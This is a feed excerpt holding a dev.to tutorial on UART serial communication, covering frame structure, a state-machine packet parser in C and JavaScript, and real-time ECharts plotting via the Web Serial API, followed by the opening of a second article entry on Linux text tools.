&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/uart-serial-communication-guide-principles-parsing-visualization.html" rel="noopener noreferrer"&gt;UART Serial Communication Guide: Principles, Parsing &amp;amp; Visualization&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;As one of the most fundamental communication methods in embedded systems and the Internet of Things (IoT), serial communication (UART) is a core technology that every hardware/software engineer must master. It serves not only as a “window” for device debugging but also as a “link” for data exchange between sensors, microcontrollers, and industrial equipment. This article will start with the underlying principles of serial communication, explain protocol parsing logic and data processing methods in detail, and demonstrate how to efficiently implement visual analysis of serial data using practical tools—helping you truly grasp the key essentials of serial communication technology.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fputyiljx0b8drn53nrpj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fputyiljx0b8drn53nrpj.png" width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  I. The Underlying Logic of Serial Communication: Why Can Data Be Transmitted with Just Three Wires?
&lt;/h2&gt;

&lt;p&gt;Many engineers use serial communication regularly, yet they may not fully understand its underlying communication logic. At its core, serial communication is &lt;strong&gt;asynchronous serial communication&lt;/strong&gt;, which enables bidirectional data transmission via two data lines (TX for transmission, RX for reception) and a GND line for reference voltage. Unlike SPI or I2C, it does not require a clock line for synchronization; instead, it relies on “pre-agreed timing” to ensure accurate data reception.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.1 Core Parameters of Serial Communication: The “Language Rules” Determining Data Transmission
&lt;/h3&gt;

&lt;p&gt;To establish stable serial communication, both parties must first align on “language rules”—specifically, the following 5 core parameters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Baud Rate&lt;/strong&gt;: The number of binary bits transmitted per unit time. Common values include 9600, 115200, and 38400 bps. For example, 9600 bps means 9600 bits are transmitted per second (including start bits, data bits, parity bits, and stop bits); the actual effective data rate excludes control bits.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Data Bits&lt;/strong&gt;: The number of valid data bits in each data frame, typically 8 bits (corresponding to one byte) or 7 bits (compatible with ASCII encoding).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Stop Bits&lt;/strong&gt;: A flag indicating the end of a data frame, configurable as 1, 1.5, or 2 bits. It gives the receiver time to prepare for the next frame.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Parity Bit&lt;/strong&gt;: Used to check for transmission errors. Options include odd parity (the total number of 1s in data bits + parity bit is odd), even parity (the total number of 1s is even), and no parity (the most common choice, relying on upper-layer protocols for error tolerance).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Flow Control&lt;/strong&gt;: An optional parameter to prevent data overflow (e.g., RTS/CTS hardware flow control, XON/XOFF software flow control). It is unnecessary in most simple scenarios (e.g., sensor data transmission).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Key Principle&lt;/strong&gt;: The transmitter encapsulates data into frames (start bit + data bits + parity bit + stop bit) based on the parameters. The receiver parses the frame structure using the same parameters—mismatched parameters will result in garbled data (e.g., “####” or random characters when baud rates differ).&lt;/p&gt;

&lt;h3&gt;
  
  
  1.2 Serial Data Frame Structure: How a Frame Is “Split” and “Identified”
&lt;/h3&gt;

&lt;p&gt;Serial communication transmits data in “frames.” The standard frame structure (using 8 data bits, 1 stop bit, and no parity as an example) is as follows:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Start Bit (1 bit)&lt;/strong&gt; : A low level (logic 0) that signals the start of a frame, breaking the previous high-level idle state.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Data Bits (8 bits)&lt;/strong&gt; : Transmitted from the least significant bit (LSB) to the most significant bit (MSB). For example, to send the byte 0x5A (binary 01011010), the actual transmission order is 0→1→0→1→1→0→1→0.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Stop Bit (1 bit)&lt;/strong&gt; : A high level (logic 1) that marks the end of a frame. Configurable as 1, 1.5, or 2 bits, it ensures the receiver has sufficient time to prepare for the next frame.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Example&lt;/strong&gt;: To send the character “A” (ASCII code 0x41, binary 01000001), the complete data frame is:&lt;br&gt;&lt;br&gt;
Start bit (0) → Data bits (1→0→0→0→0→0→1→0) → Stop bit (1)&lt;/p&gt;

&lt;p&gt;The receiver triggers data reception by detecting the “low-level start bit,” then samples subsequent bits synchronously based on the baud rate, and finally reconstructs the complete byte.&lt;/p&gt;

&lt;h2&gt;
  
  
  II. Serial Protocol Parsing: How to Extract Valid Data from a “Binary Stream”?
&lt;/h2&gt;

&lt;p&gt;In practical projects, serial communication rarely transmits single bytes—it typically sends “data packets” encapsulated in custom protocols (e.g., sensor data, device control commands). Parsing byte-by-byte directly leads to data confusion, so mastering core protocol parsing methods is essential.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Common Custom Serial Protocol Formats
&lt;/h3&gt;

&lt;p&gt;Most projects adopt a protocol structure of “Header + Length + Data + Checksum” to ensure data integrity and identifiability. A typical format is shown below:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Field&lt;/th&gt;
&lt;th&gt;Length (Bytes)&lt;/th&gt;
&lt;th&gt;Function Description&lt;/th&gt;
&lt;th&gt;Example Value&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Start of Frame (SOF)&lt;/td&gt;
&lt;td&gt;1–2&lt;/td&gt;
&lt;td&gt;Identifies the start of a packet to avoid misrecognition&lt;/td&gt;
&lt;td&gt;0xAA (1 byte), 0x55AA (2 bytes)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data Length&lt;/td&gt;
&lt;td&gt;1–2&lt;/td&gt;
&lt;td&gt;Indicates the number of bytes in the subsequent “data segment”&lt;/td&gt;
&lt;td&gt;0x04 (4-byte data segment)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data Segment&lt;/td&gt;
&lt;td&gt;Variable&lt;/td&gt;
&lt;td&gt;Valid data (e.g., sensor values, commands)&lt;/td&gt;
&lt;td&gt;0x00 0x1E 0x00 0x3C (25°C, 60% humidity)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Checksum&lt;/td&gt;
&lt;td&gt;1–2&lt;/td&gt;
&lt;td&gt;Verifies packet integrity&lt;/td&gt;
&lt;td&gt;XOR checksum, CRC16&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;End of Frame (EOF)&lt;/td&gt;
&lt;td&gt;1–2 (Optional)&lt;/td&gt;
&lt;td&gt;Marks the end of a packet&lt;/td&gt;
&lt;td&gt;0xBB&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Why This Structure?&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Suppose a sensor sends temperature and humidity data once per second. Without a header/trailer, the receiver might misidentify “residual data from the previous frame” or “interference noise” as valid data. By using a fixed header (e.g., 0xAA), the receiver first filters out non-header data, extracts the complete data segment based on “data length,” and finally verifies data correctness via the checksum.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.2 Core Logic of Protocol Parsing: Implementation with a State Machine
&lt;/h3&gt;

&lt;p&gt;The optimal way to parse custom serial protocols is to use a &lt;strong&gt;state machine&lt;/strong&gt;, which processes each field of the data frame through different states to avoid data sticking or loss. Taking the protocol “0xAA (header) + 1-byte length + N-byte data + 1-byte XOR checksum” as an example, the state machine design is as follows:&lt;/p&gt;

&lt;h4&gt;
  
  
  Step 1: Define Parsing States
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Example in C; logic applies to other languages
typedef enum {STATE_WAIT_SOF = 0,  // Wait for header (0xAA)
    STATE_GET_LEN,       // Receive data length
    STATE_GET_DATA,      // Receive data segment
    STATE_GET_CRC,       // Receive checksum
    STATE_CHECK_CRC      // Verify and process data
} ParseState;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Step 2: Process Each Byte of Data by State
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ParseState state = STATE_WAIT_SOF;
uint8_t data_buf[64] = {0};  // Data buffer
uint8_t data_len = 0;        // Length of data segment
uint8_t data_idx = 0;        // Index for data segment reception
uint8_t crc_calc = 0;        // Calculated checksum value

void parse_serial_data(uint8_t byte) {switch(state) {
        case STATE_WAIT_SOF:
            if (byte == 0xAA) {  // Header detected
                state = STATE_GET_LEN;
                crc_calc = byte;  // Initialize checksum with header
            }
            break;

        case STATE_GET_LEN:
            data_len = byte;
            crc_calc ^= byte;  // Accumulate checksum
            if (data_len &amp;gt; 0 &amp;amp;&amp;amp; data_len &amp;lt;= 60) {  // Limit length to prevent buffer overflow
                state = STATE_GET_DATA;
                data_idx = 0;
            } else {state = STATE_WAIT_SOF;  // Reset on invalid length}
            break;

        case STATE_GET_DATA:
            data_buf[data_idx++] = byte;
            crc_calc ^= byte;
            if (data_idx == data_len) {  // Data segment reception complete
                state = STATE_GET_CRC;
            }
            break;

        case STATE_GET_CRC:
            if (byte == crc_calc) {  // Checksum verified
                state = STATE_CHECK_CRC;
            } else {state = STATE_WAIT_SOF;  // Reset on checksum failure}
            break;

        case STATE_CHECK_CRC:
            // Process data after verification (e.g., extract temperature and humidity)
            uint16_t temp = (data_buf[0] &amp;lt;&amp;lt; 8) | data_buf[1];  // Temperature (16-bit)
            uint16_t humi = (data_buf[2] &amp;lt;&amp;lt; 8) | data_buf[3];  // Humidity (16-bit)
            printf("Temperature: %.1f°C, Humidity: %.1f%%\n", temp/10.0, humi/10.0);

            // Reset state to wait for next frame after processing
            state = STATE_WAIT_SOF;
            break;
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Key Considerations&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Limit data length to prevent buffer overflow from malicious data.&lt;/li&gt;
&lt;li&gt;  The checksum must include the header, length, and data segment to ensure the integrity of the entire frame.&lt;/li&gt;
&lt;li&gt;  If data reception is incomplete for an extended period (e.g., timeout), reset the state machine to avoid system halts.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  III. Serial Data Processing and Visualization: From “Byte Stream” to “Intuitive Charts”
&lt;/h2&gt;

&lt;p&gt;After extracting valid data, how can you quickly analyze data trends (e.g., sensor data changes over time)? The traditional method—exporting data to Excel and plotting manually—is highly inefficient. Tools enable “real-time parsing + visualization” integration, significantly improving debugging efficiency.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Core Requirements for Data Visualization: Real-Time Performance and Flexibility
&lt;/h3&gt;

&lt;p&gt;Serial data visualization must meet two core scenarios:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Real-Time Monitoring&lt;/strong&gt;: For example, when debugging environmental monitoring devices, you need to view real-time curves of temperature, humidity, or air pressure.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Historical Review&lt;/strong&gt;: For example, when testing device stability, you need to record data over hours to analyze abnormal fluctuations.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The key to fulfilling these requirements is “linkage between data parsing and chart rendering”—after the parsing module extracts valid data, it transmits it to the chart module in real time, which updates the view based on the timeline.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.2 Visualization Implementation with JavaScript: From Parsing to Plotting
&lt;/h3&gt;

&lt;p&gt;First, we introduce an online serial tool (&lt;a href="https://serial.devresourcehub.com/" rel="noopener noreferrer"&gt;https://serial.devresourcehub.com&lt;/a&gt;) that supports online serial connection, data transmission/reception, and a powerful plugin system for chart plotting using JavaScript (with the built-in ECharts library for enhanced functionality).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpgv7wr90airwum6qjmig.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpgv7wr90airwum6qjmig.png" width="800" height="318"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Step 1: Serial Connection and Data Reception (Based on Web Serial API)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;let port;
let reader;
let chart;  // Chart instance

// Connect to serial port
async function connectSerial() {port = await navigator.serial.requestPort();
    await port.open({baudRate: 9600});  // Match device baud rate

    // Receive serial data (read byte by byte)
    reader = port.readable.getReader();
    const decoder = new TextDecoder('utf-8');  // Use Uint8Array for binary data
    while (true) {const { value, done} = await reader.read();
        if (done) break;
        const rawData = decoder.decode(value);  // Raw data (e.g., "AA 04 00 1E 00 3C 58")
        parseSerialData(rawData);  // Parse data
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Step 2: Protocol Parsing (Corresponding to the Custom Protocol in Section 2.2)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;let parseState = "WAIT_SOF";
let dataBuf = [];
let dataLen = 0;
let dataIdx = 0;
let crcCalc = 0;

function parseSerialData(rawData) {// Convert raw string (e.g., "AA 04 00 1E 00 3C 58") to byte array
    const bytes = rawData.split(" ")
                         .map(hex =&amp;gt; parseInt(hex, 16))
                         .filter(byte =&amp;gt; !isNaN(byte));

    bytes.forEach(byte =&amp;gt; {switch(parseState) {
            case "WAIT_SOF":
                if (byte === 0xAA) {
                    parseState = "GET_LEN";
                    crcCalc = byte;
                    dataBuf = [];
                }
                break;
            case "GET_LEN":
                dataLen = byte;
                crcCalc ^= byte;
                if (dataLen &amp;gt; 0 &amp;amp;&amp;amp; dataLen &amp;lt;= 60) {
                    parseState = "GET_DATA";
                    dataIdx = 0;
                } else {parseState = "WAIT_SOF";}
                break;
            case "GET_DATA":
                dataBuf.push(byte);
                crcCalc ^= byte;
                if (dataIdx++ === dataLen - 1) {parseState = "GET_CRC";}
                break;
            case "GET_CRC":
                if (byte === crcCalc) {// Extract temperature and humidity (assume data segment: [temp_high, temp_low, humi_high, humi_low])
                    const temp = (dataBuf[0] &amp;lt;&amp;lt; 8 | dataBuf[1]) / 10.0;
                    const humi = (dataBuf[2] &amp;lt;&amp;lt; 8 | dataBuf[3]) / 10.0;
                    updateChart(temp, humi);  // Update chart
                }
                parseState = "WAIT_SOF";
                break;
        }
    });
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Step 3: Real-Time Chart Rendering with ECharts
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Initialize chart
function initChart() {const chartDom = document.getElementById('serial-chart');
    chart = echarts.init(chartDom);

    const option = {title: { text: 'Real-Time Temperature &amp;amp; Humidity Monitoring'},
        tooltip: {trigger: 'axis'},
        legend: {data: ['Temperature (°C)', 'Humidity (%)'] },
        xAxis: {
            type: 'time',
            splitLine: {show: false},
            axisLabel: {formatter: '{hh}:{mm}:{ss}' }  // Time format
        },
        yAxis: [
            {name: 'Temperature (°C)', type: 'value', min: 0, max: 50 },
            {name: 'Humidity (%)', type: 'value', min: 0, max: 100, position: 'right' }
        ],
        series: [
            {name: 'Temperature (°C)',
                type: 'line',
                data: [],
                smooth: true,  // Smooth curve
                yAxisIndex: 0
            },
            {name: 'Humidity (%)',
                type: 'line',
                data: [],
                smooth: true,
                yAxisIndex: 1,
                lineStyle: {color: '#ff4500'}
            }
        ]
    };
    chart.setOption(option);
}

// Update chart data
function updateChart(temp, humi) {const now = new Date();
    const timeStr = now.toISOString();  // Timestamp

    const option = chart.getOption();
    // Limit number of data points (retain only last 10 minutes of data)
    if (option.series[0].data.length &amp;gt; 600) {option.series[0].data.shift();
        option.series[1].data.shift();}
    // Add new data
    option.series[0].data.push([timeStr, temp]);
    option.series[1].data.push([timeStr, humi]);
    chart.setOption(option);
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Practical Application&lt;/strong&gt;: The above logic can be integrated into online serial tools (e.g., browsers supporting the Web Serial API). No local development environment is required—simply open the browser to complete the entire workflow of “serial connection → protocol parsing → real-time plotting,” eliminating the need to rewrite basic code repeatedly.&lt;/p&gt;

&lt;h2&gt;
  
  
  IV. Common Serial Debugging Issues and Solutions
&lt;/h2&gt;

&lt;p&gt;Even with a solid grasp of technical principles, you may encounter various issues during debugging. Below is a troubleshooting guide for high-frequency problems:&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 Garbled Received Data: Parameter Mismatch or Voltage Issues
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Troubleshooting Step 1&lt;/strong&gt;: Confirm that the baud rate, data bits, stop bits, and parity bit exactly match the device (mismatched baud rates are the most common cause).&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Troubleshooting Step 2&lt;/strong&gt;: Check if TX/RX pins are reversed (connect device TX to USB module RX, and device RX to USB module TX).&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Troubleshooting Step 3&lt;/strong&gt;: For 3.3V devices, verify that the USB module’s output voltage is compatible (avoid damaging 3.3V devices with 5V levels).&lt;/p&gt;

&lt;h3&gt;
  
  
  4.2 Data Loss or Sticking: Protocol Design or Hardware Issues
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Software Layer&lt;/strong&gt;: Optimize protocol parsing logic (e.g., use a state machine) and add a timeout reset mechanism.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Hardware Layer&lt;/strong&gt;: Check for loose wiring (shielded cables are recommended to reduce interference) and lower the baud rate (high baud rates are prone to interference-induced data loss).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Protocol Layer:&lt;/strong&gt;  If data is sent at a high frequency, add a frame trailer identifier or adopt “fixed frame intervals” (e.g., 10ms between frames) for transmission.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  V. Advanced Application Scenarios of Serial Communication: Beyond “Debugging”
&lt;/h2&gt;

&lt;p&gt;Serial communication is not limited to “viewing device logs”—in IoT and industrial control, it also plays a core role in data collection and device control. Below are typical advanced scenarios:&lt;/p&gt;

&lt;h3&gt;
  
  
  5.1 Multi-Device Serial Networking: Application of RS485 Bus
&lt;/h3&gt;

&lt;p&gt;When multiple serial devices (e.g., multiple sensors, multiple controllers) need to be connected, simplex UART (TX/RX) cannot meet the demand. Instead, the &lt;strong&gt;RS485 bus&lt;/strong&gt; is commonly used for multi-device communication:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Hardware Principle&lt;/strong&gt;: RS485 uses differential signal transmission (two signal lines: A and B), offering far stronger anti-interference capabilities than UART. It supports transmission distances up to 1200 meters and can connect up to 32 devices on the same bus.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Communication Mode&lt;/strong&gt;: Adopts a “master-slave mode,” where the master distinguishes between different slaves via device addresses (e.g., the master sends “0x01 + command,” and only the slave with address 0x01 responds).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Protocol Adaptation&lt;/strong&gt;: Most RS485 devices still communicate based on serial protocols (e.g., Modbus-RTU protocol). Only an “equipment address” field needs to be added to the serial parameters to enable multi-device interaction.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Tool Assistance&lt;/strong&gt;: When debugging RS485 networked devices, use the “multi-device address configuration” plugin of online serial assistants to quickly switch target device addresses, send commands, and receive responses—no need to manually modify address parameters in the code.&lt;/p&gt;

&lt;h3&gt;
  
  
  5.2 Serial-to-Network Bridging: Enabling Remote Device Monitoring
&lt;/h3&gt;

&lt;p&gt;In IoT scenarios, remote monitoring of serial devices (e.g., sensors in factory workshops, monitoring devices in remote areas) is often required. This is typically achieved using “serial-to-network” modules (e.g., ESP8266, ESP32):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Implementation Logic&lt;/strong&gt;: The module connects to the serial device via UART, converts serial data into TCP/UDP network data, and uploads it to the cloud via WiFi or Ethernet.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Data Interaction&lt;/strong&gt;: A remote terminal (e.g., computer, mobile APP) sends commands to the module over the network. The module converts the commands into serial data and sends them to the device, while transmitting the device’s response data back to the remote terminal.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Protocol Selection&lt;/strong&gt;: For low power consumption, the MQTT protocol is suitable for data transmission (adapted to IoT scenarios); for real-time performance, direct TCP connection is preferred.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Debugging Tip&lt;/strong&gt;: Use the “network serial bridging” function of online serial assistants to connect directly to a remote TCP server via a browser, receive network data from serial devices, and visualize it in real time—no need to deploy complex network debugging tools locally.&lt;/p&gt;

&lt;h3&gt;
  
  
  5.3 Serial Data Storage and Playback: Retracing Debugging Processes
&lt;/h3&gt;

&lt;p&gt;In scenarios such as device stability testing or fault diagnosis, serial data needs to be recorded and played back for post-analysis. The traditional method—saving data as a TXT file via serial tools and analyzing it manually—is inefficient:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Efficient Solution&lt;/strong&gt;: Online serial assistants support saving serial data as JSON files in the format of “timestamp + data content,” including raw data, parsed data, and chart data.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Data Playback&lt;/strong&gt;: During playback, the tool plays back data frame by frame at the original time interval, synchronously updating charts and parsing results to simulate real communication processes and quickly locate data anomalies when faults occur.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Data Filtering&lt;/strong&gt;: Supports filtering data by time range and data type (e.g., commands, responses, abnormal data) to focus on key debugging nodes.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  VI. Optimization of Serial Protocols: Improving Communication Efficiency and Reliability
&lt;/h2&gt;

&lt;p&gt;As device complexity increases, basic “header + length + data + checksum” protocols may no longer meet requirements. Protocol design needs to be optimized in the following dimensions:&lt;/p&gt;

&lt;h3&gt;
  
  
  6.1 Data Compression: Reducing Bandwidth Usage
&lt;/h3&gt;

&lt;p&gt;When serial devices transmit large volumes of data (e.g., continuous waveform data collected by sensors), uncompressed data occupies significant bandwidth and causes transmission delays:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Compression Algorithm Selection&lt;/strong&gt;: For data with large repetitions (e.g., consecutive 0x00), Run-Length Encoding (RLE) is suitable; for numerical data (e.g., temperature, voltage), differential encoding (storing the difference between adjacent data points) is preferred.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Protocol Adaptation&lt;/strong&gt;: Add a “compression flag” field (1 bit) to the protocol to indicate whether data is compressed. The receiver decides whether to decompress based on the flag.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Example&lt;/strong&gt;: For continuous temperature data “25.1, 25.2, 25.1, 25.3,” differential encoding converts it to “25.1, +0.1, -0.1, +0.2,” reducing data length.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Tool Support&lt;/strong&gt;: The “data compression/decompression” plugin of online serial assistants can automatically identify compression flags, decompress data in real time, and visualize it—no manual compression handling is required.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.2 Batch Transmission of Multiple Commands: Improving Control Efficiency
&lt;/h3&gt;

&lt;p&gt;When controlling multiple devices or performing complex operations, multiple serial commands need to be sent. Manual one-by-one transmission is time-consuming and error-prone:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Batch Transmission Solution&lt;/strong&gt;: Design a “batch command packet” protocol, where multiple commands are concatenated in the format of “command length + command content.” A “batch flag” is added to the header, and the receiver parses and executes commands one by one.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Command Priority&lt;/strong&gt;: Add a “priority” field (e.g., levels 0–3) to batch commands. The receiver executes commands by priority to ensure critical commands (e.g., emergency stop commands) are executed first.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Execution Feedback&lt;/strong&gt;: After executing each command, the receiver returns “execution results” (success/failure + error code). The master determines whether to proceed to the next command based on the feedback.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Operational Convenience&lt;/strong&gt;: Online serial assistants support importing batch command files (TXT/JSON format), setting command transmission intervals (e.g., 100ms per command), automatically sending commands, recording feedback results for each command, and generating execution reports.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.3 Fault Tolerance Mechanisms: Addressing Communication Anomalies
&lt;/h3&gt;

&lt;p&gt;Serial communication may experience anomalies due to interference or disconnection. Fault tolerance mechanisms need to be added to the protocol:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Retransmission Mechanism&lt;/strong&gt;: If the master does not receive a response within the timeout period (e.g., 100ms) after sending a command, it automatically retransmits the command (retransmission times can be set, e.g., 3 times) to avoid communication failure caused by single interference.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Data Backup&lt;/strong&gt;: Before executing a command, the receiver backs up critical data (e.g., device parameters). If command execution fails (e.g., checksum error), it restores the backup data to prevent abnormal device status.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Heartbeat Packets&lt;/strong&gt;: The master and device send heartbeat packets (e.g., “0xAA 0x01 0x00 0xAA”) at regular intervals (e.g., 1 second). If the master does not receive a heartbeat packet for 3 consecutive times, it determines the device is offline and triggers an alarm mechanism.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Debugging Assistance&lt;/strong&gt;: The “communication fault tolerance test” function of online serial assistants can simulate abnormal scenarios such as data loss, interference, and disconnection, test the device’s fault tolerance, and record communication data when anomalies occur to help optimize the protocol’s fault tolerance logic.&lt;/p&gt;

&lt;h2&gt;
  
  
  VII. Conclusion: Technological Evolution of Serial Communication and Tool Empowerment
&lt;/h2&gt;

&lt;p&gt;Serial communication has evolved from the original RS232 protocol (suitable for short-distance, single-device communication) to the RS485 protocol (suitable for long-distance, multi-device communication), and further to integration with networks and the cloud. It remains a core communication method in embedded systems and IoT. Its technical core lies in “reasonable protocol design” and “efficient data processing,” while tools add value by lowering technical barriers and improving debugging efficiency.&lt;/p&gt;

&lt;p&gt;As a web-based tool, online serial assistants not only solve the pain points of traditional tools (e.g., “installation dependencies,” “limited functionality”) but also adapt to full-scenario needs from basic debugging to advanced applications through plugin systems, data visualization, and network bridging:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;For Novice Engineers&lt;/strong&gt;: No in-depth mastery of low-level code is required—serial connection, data parsing, and chart analysis can be completed via a visual interface.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;For Senior Engineers&lt;/strong&gt;: Custom plugins and protocol optimization are supported, enabling rapid verification of complex communication logic and fault tolerance mechanisms.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;For Team Collaboration&lt;/strong&gt;: Data files, plugins, and debugging reports can be shared online, reducing debugging costs across devices and environments.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In the future, with the development of IoT technology, serial communication will be further integrated with edge computing and AI analysis (e.g., real-time analysis of abnormal patterns in serial data via AI algorithms). Online serial assistants will also continue to iterate, adapting to more complex scenarios and providing more efficient technical support for engineers.&lt;/p&gt;

&lt;p&gt;If you encounter specific problems in serial communication practice or need to optimize protocol design, feel free to share your scenarios in the comment section—we can discuss solutions together. You can also use the “technical community” function of online serial assistants to exchange experiences with other engineers and jointly promote the application and innovation of serial communication technology.&lt;/p&gt;

</description>
      <category>uart</category>
      <category>serial</category>
    </item>
    <item>
      <title>Linux Text Processing: Master grep, awk, sed &amp; jq for Developers</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Thu, 30 Oct 2025 06:49:31 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/linux-text-processing-master-grep-awk-sed-jq-for-developers-3og7</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/linux-text-processing-master-grep-awk-sed-jq-for-developers-3og7</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;Learn how to use grep, awk, sed, and jq for efficient Linux text processing. This practical guide covers syntax, real-world examples, and best practices for sysadmins, developers, and data engineers.&lt;/p&gt;
&lt;/blockquote&gt;

